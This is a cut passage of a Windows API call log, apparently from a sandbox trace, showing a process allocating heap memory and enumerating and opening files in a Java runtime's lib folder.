hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0094.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0094.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0094.511] AreFileApisANSI () returned 1 [0094.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet", lpUsedDefaultChar=0x0) returned 46 [0094.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0094.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0094.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0094.511] AreFileApisANSI () returned 1 [0094.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0094.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0094.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet") returned 46 [0094.511] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\applet"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.511] GetLastError () returned 0x5 [0094.511] GetLastError () returned 0x5 [0094.511] SetLastError (dwErrCode=0x5) [0094.511] GetLastError () returned 0x5 [0094.511] SetLastError (dwErrCode=0x5) [0094.511] GetLastError () returned 0x5 [0094.511] SetLastError (dwErrCode=0x5) [0094.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0094.512] AreFileApisANSI () returned 1 [0094.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0094.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet") returned 46 [0094.512] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\applet"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.512] GetLastError () returned 0x5 [0094.512] GetLastError () returned 0x5 [0094.512] SetLastError (dwErrCode=0x5) [0094.512] GetLastError () returned 0x5 [0094.512] SetLastError (dwErrCode=0x5) [0094.512] GetLastError () returned 0x5 [0094.512] SetLastError (dwErrCode=0x5) [0094.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0094.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0094.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0094.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0094.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.512] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0094.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0094.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0094.513] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78690 [0094.513] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.513] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.513] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0094.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0094.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.514] AreFileApisANSI () returned 1 [0094.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties", lpUsedDefaultChar=0x0) returned 60 [0094.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0094.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.515] AreFileApisANSI () returned 1 [0094.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0094.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0094.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 60 [0094.515] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.515] GetFileType (hFile=0x360) returned 0x1 [0094.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0094.515] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.515] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.516] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.516] CloseHandle (hObject=0x360) returned 1 [0094.516] AreFileApisANSI () returned 1 [0094.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0094.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69e30 [0094.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 60 [0094.516] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.516] GetFileType (hFile=0x360) returned 0x1 [0094.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0094.516] CloseHandle (hObject=0x360) returned 1 [0094.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.518] AreFileApisANSI () returned 1 [0094.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0094.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 60 [0094.518] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562)) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.518] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa7bbd53, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa7bbd53, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="charsets.jar", cAlternateFileName="")) returned 1 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 